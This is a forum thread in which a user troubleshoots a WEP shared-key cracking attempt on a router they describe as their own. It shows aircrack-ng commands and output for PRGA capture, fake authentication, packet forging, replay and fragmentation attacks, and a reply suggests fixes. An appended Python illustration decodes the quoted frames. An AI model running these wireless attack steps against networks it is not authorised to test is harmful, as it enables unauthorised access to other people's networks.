
Thread: WEP _SKA_Got Low IVS rate

  1. #1
    Junior Member, joined Jul 2009, 27 posts

    WEP _SKA_Got Low IVS rate

    Hello everybody, I have a problem with IVs; I will try to explain what I did.
    I set my router to use a WEP SKA key in ASCII format; the key is "77777".
    I used BT4-pr in order to obtain it via aircrack. First of all, here is a
    general overview of my steps:
    1. Put the card into monitor mode (Intel 5100)
    2. Dump the shared-key PRGA
    3. Associate with the AP
    4. Inject packets with the fragmentation attack (packets were injected, about 60000, but only 1 IV received)
    5. Recover the shared key
    I am stuck at obtaining IVs: I got only 1, although packets were injected successfully.
    Code:
    1.
    root@track-laptop:~# airmon-ng start wlan0
    
    
    Interface	Chipset		Driver
    
    wlan0		Intel 4965/5xxx	iwlagn - [phy0]
    				(monitor mode enabled on mon0)
    
    root@track-laptop:~# iwconfig
    lo        no wireless extensions.
    
    eth0      no wireless extensions.
    
    wmaster0  no wireless extensions.
    
    wlan0     IEEE 802.11abgn  ESSID:""  
              Mode:Managed  Frequency:2.437 GHz  Access Point: Not-Associated   
              Tx-Power=15 dBm   
              Retry min limit:7   RTS thr:off   Fragment thr=2352 B   
              Encryption key:off
              Power Management:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
    mon0      IEEE 802.11abgn  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=15 dBm   
              Retry min limit:7   RTS thr:off   Fragment thr=2352 B   
              Encryption key:off
              Power Management:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
              
    root@track-laptop:~# ifconfig
    lo        Link encap:Local Loopback  
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:100 errors:0 dropped:0 overruns:0 frame:0
              TX packets:100 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0 
              RX bytes:5000 (5.0 KB)  TX bytes:5000 (5.0 KB)
    
    mon0      Link encap:UNSPEC  HWaddr 00-21-6B-11-16-F2-30-30-00-00-00-00-00-00-00-00  
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:2303 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
              RX bytes:175264 (175.2 KB)  TX bytes:0 (0.0 B)
    
    wmaster0  Link encap:UNSPEC  HWaddr 00-21-6B-11-16-F2-00-00-00-00-00-00-00-00-00-00  
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000 
              RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
    Here is my target network:
    Code:
    root@track-laptop:~# airodump-ng mon0
    
    
    
    CH  6 ][ Elapsed: 8 s ][ 2009-07-19 13:39                                         
                                                                                                     
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                  
                                                                                                     
     
     00:19:E0:79:F7:26  -29       21        0    0   6  54 . WEP  WEP         OCEAN                  
                                                                                                     
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    2. Dumping the shared-key PRGA; here I connected one wireless client
    Code:
    airodump-ng -c 6 --bssid 00:19:E0:79:F7:26 -w sharedkey mon0
    
     CH  6 ][ Elapsed: 1 min ][ 2009-07-19 13:43 ][ 140 bytes keystream: 00:19:E0:79:F7:26           
                                                                                                     
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID              
                                                                                                     
     00:19:E0:79:F7:26  -19   3      750       34    0   6  54 . WEP  WEP    SKA  OCEAN              
                                                                                                     
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes                       
                                                                                                     
     00:19:E0:79:F7:26  00:1E:3D:BC:38:4E  -30   54 - 2      0       41
    3. Associating with AP
    Code:
    root@track-laptop:~# aireplay-ng -1 0 -e OCEAN -y sharedkey-01-00-19-E0-79-F7-26.xor -a 00:19:E0:79:F7:26 -h 00-21-6B-11-16-F2 mon0
    13:47:22  Waiting for beacon frame (BSSID: 00:19:E0:79:F7:26) on channel 6
    
    
    13:47:32  Sending Authentication Request (Shared Key) [ACK]
    13:47:32  Authentication 1/2 successful
    13:47:32  Sending encrypted challenge. [ACK]
    13:47:32  Authentication 2/2 successful
    13:47:32  Sending Association Request [ACK]
    13:47:32  Association successful :-) (AID: 1)
    4. Injecting packets
    Code:
    root@track-laptop:~# packetforge-ng -0 -a 00:19:E0:79:F7:26 -h 00-21-6B-11-16-F2 -k 255.255.255.255 -l 255.255.255.255 -y sharedkey-01-00-19-E0-79-F7-26.xor -w arp-request
    Wrote packet to: arp-request
    
    airodump-ng -c 6 --bssid 00:19:E0:79:F7:26 -w capture mon0
    
    
    root@track-laptop:~# aireplay-ng -2 -r arp-request mon0
    No source MAC (-h) specified. Using the device MAC (00:21:6B:11:16:F2)
    
    
            Size: 68, FromDS: 0, ToDS: 1 (WEP)
    
                  BSSID  =  00:19:E0:79:F7:26
              Dest. MAC  =  FF:FF:FF:FF:FF:FF
             Source MAC  =  00:21:6B:11:16:F2
    
            0x0000:  0841 0201 0019 e079 f726 0021 6b11 16f2  .A.....y.&.!k...
            0x0010:  ffff ffff ffff 8001 000b fb00 3325 5636  ............3%V6
            0x0020:  65df 6b2d 8841 32ea fbb0 7617 d131 8e7e  e.k-.A2...v..1.~
            0x0030:  aa70 ae8e 18fb 2e52 3913 c7cf cb5e 37d7  .p.....R9....^7.
            0x0040:  b5e1 9558                                ...X
    
    Use this packet ? y
    
    Saving chosen packet in replay_src-0719-135536.cap
    You should also start airodump-ng to capture replies
    5. Recovering the shared key; as shown, only 1 IV is available
    Code:
    root@track-laptop:~# aircrack-ng -b 00:19:E0:79:F7:26 capture*.cap
    Opening capture-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 1 ivs.
    
    
    
    
                                     Aircrack-ng 1.0 rc3 r1552
    
    
                     [00:00:00] Tested 0 keys (got 1 IVs)
    
       KB    depth   byte(vote)
        0  255/256   FF(   0) 00(   0) 01(   0) 02(   0) 03(   0)
        1    0/  7   BF( 256) 00(   0) 01(   0) 02(   0) 03(   0)
        2    0/  1   87( 256) 00(   0) 01(   0) 02(   0) 03(   0)
        3    0/  3   0C( 256) 00(   0) 01(   0) 02(   0) 03(   0)
        4    0/  4   82( 256) 00(   0) 01(   0) 02(   0) 03(   0)
    
    Failed. Next try with 5000 IVs.
    ^C
    Quitting aircrack-ng...

  2. #2
    Just burned his ISO, joined Jul 2009, 6 posts

    Hello,

    I am no expert, but I believe you have gone wrong in step 4:

    BSSID = 00:19:E0:79:F7:26
    Dest. MAC = FF:FF:FF:FF:FF:FF
    Source MAC = 00:21:6B:11:16:F2

    The Dest. MAC should not be FF:FF:FF:FF:FF:FF.

    Say no to choosing that packet until you have a real dest. MAC. If not successful, try to de-authenticate again.

    Hope this helps.

  3. #3
    Junior Member, joined Jul 2009, 27 posts

    Here I forgot about one important step! I didn't run the fragmentation attack to obtain the 1500 PRGA key. But I can't get it. Lack of association? But fake authentication had been accepted in the previous step.
    Code:
    root@track-laptop:~# aireplay-ng -5 -b 00:19:E0:79:F7:26 -h 00-21-6B-11-16-F2 -k 255.255.255.255 -l 255.255.255.255 mon0
    13:27:55  Waiting for beacon frame (BSSID: 00:19:E0:79:F7:26) on channel 6
    13:27:56  Waiting for a data packet...
    
    
            Size: 68, FromDS: 0, ToDS: 1 (WEP)
    
                  BSSID  =  00:19:E0:79:F7:26
              Dest. MAC  =  FF:FF:FF:FF:FF:FF
             Source MAC  =  00:1E:3D:BC:38:4E
    
            0x0000:  0841 d500 0019 e079 f726 001e 3dbc 384e  .A.....y.&..=.8N
            0x0010:  ffff ffff ffff d002 d33c 2400 b61a f1a3  .........<$.....
            0x0020:  17b4 123d d737 0f3a fcf7 8127 0da4 3ac4  ...=.7.:...'..:.
            0x0030:  7188 2148 0af4 d58e b76b 2fb8 a936 0df8  q.!H.....k/..6..
            0x0040:  3bcb ab8e                                ;...
    
    Use this packet ? y
    
    Saving chosen packet in replay_src-0721-132756.cap
    13:28:04  Data packet found!
    13:28:04  Sending fragmented packet
    13:28:05  No answer, repeating...
    13:28:05  Trying a LLC NULL packet
    13:28:05  Sending fragmented packet
    13:28:07  No answer, repeating...
    13:28:07  Sending fragmented packet
    13:28:08  No answer, repeating...
    13:28:08  Trying a LLC NULL packet
    13:28:08  Sending fragmented packet
    13:28:10  No answer, repeating...
    13:28:10  Sending fragmented packet
    13:28:11  No answer, repeating...
    13:28:11  Trying a LLC NULL packet
    13:28:11  Sending fragmented packet
    13:28:13  No answer, repeating...
    13:28:13  Sending fragmented packet
    13:28:14  No answer, repeating...
    13:28:14  Trying a LLC NULL packet
    13:28:14  Sending fragmented packet
    13:28:16  No answer, repeating...
    13:28:16  Sending fragmented packet
    13:28:17  No answer, repeating...
    13:28:17  Trying a LLC NULL packet
    13:28:17  Sending fragmented packet
    So, I tried KoreK chop-chop and fragmentation; these attacks don't work. Then I used ARP request replay and interactive replay (0841); these allow me to inject packets, but the IV count doesn't increase. Is it a card issue or something else?
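Added illustration, not from this thread or from aircrack-ng: the Python below re-types the two frame hex dumps quoted in posts #1 and #3 as byte strings, decodes the 802.11 header the way aireplay-ng prints it (BSSID / Dest. MAC / Source MAC) and pulls out the 3-byte WEP IV that sits unencrypted in front of the ciphertext. It shows why 60000 replays of one captured frame still register as "got 1 IVs": every replay carries the same IV, and only frames freshly encrypted by the AP (its replies to the injected traffic) bring new ones. The parser and the `distinct_ivs` counter are my own and assume the three-address (non-WDS) frame layout only.

```python
import struct
from typing import Dict, List

# Constructed inputs: the two frames are the hex dumps quoted in posts #1 and #3
# of this thread, re-typed as bytes (they are WEP ciphertext; no key is involved).
FRAME_POST1 = bytes.fromhex(
    "0841 0201 0019e079f726 00216b1116f2 ffffffffffff 8001 000bfb 00 "
    "33255636 65df6b2d 884132ea fbb07617 d1318e7e "
    "aa70ae8e 18fb2e52 3913c7cf cb5e37d7 b5e19558")
FRAME_POST3 = bytes.fromhex(
    "0841 d500 0019e079f726 001e3dbc384e ffffffffffff d002 d33c24 00 "
    "b61af1a3 17b4123d d7370f3a fcf78127 0da43ac4 "
    "71882148 0af4d58e b76b2fb8 a9360df8 3bcbab8e")

def mac(b: bytes) -> str:
    return ":".join(f"{x:02X}" for x in b)

def parse_wep_data_frame(frame: bytes) -> Dict[str, object]:
    """Decode the 802.11 MAC header and the WEP IV of one protected data frame.
    Layout: 24-byte header, 3-byte IV + key-id byte (in the clear), ciphertext, 4-byte ICV."""
    if len(frame) < 24 + 4 + 4:
        raise ValueError("too short for header + IV/key-id + ICV")
    fc = struct.unpack_from("<H", frame, 0)[0]        # frame control, little-endian
    if (fc >> 2) & 0x3 != 2:
        raise ValueError("not a data frame")
    if not fc & 0x4000:
        raise ValueError("Protected Frame bit clear: no IV to read")
    to_ds, from_ds = bool(fc & 0x0100), bool(fc & 0x0200)
    if to_ds and from_ds:
        raise ValueError("4-address (WDS) frame not handled")
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if to_ds:            # station -> AP:  a1 = BSSID, a2 = source, a3 = destination
        bssid, src, dst = a1, a2, a3
    elif from_ds:        # AP -> station:  a1 = destination, a2 = BSSID, a3 = source
        dst, bssid, src = a1, a2, a3
    else:                # ad hoc:         a1 = destination, a2 = source, a3 = BSSID
        dst, src, bssid = a1, a2, a3
    return {"to_ds": to_ds, "from_ds": from_ds,
            "bssid": mac(bssid), "src": mac(src), "dst": mac(dst),
            "iv": frame[24:27].hex(), "key_id": frame[27] >> 6,
            "body_len": len(frame) - 28 - 4, "icv": frame[-4:].hex()}

def distinct_ivs(frames: List[bytes]) -> int:
    """What aircrack-ng's 'got N IVs' reflects: replays of one frame add no new IV."""
    return len({parse_wep_data_frame(f)["iv"] for f in frames})

if __name__ == "__main__":
    print(parse_wep_data_frame(FRAME_POST1), parse_wep_data_frame(FRAME_POST3))
    print("IVs from 60000 replays of the post #1 frame:", distinct_ivs([FRAME_POST1] * 60000))
```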
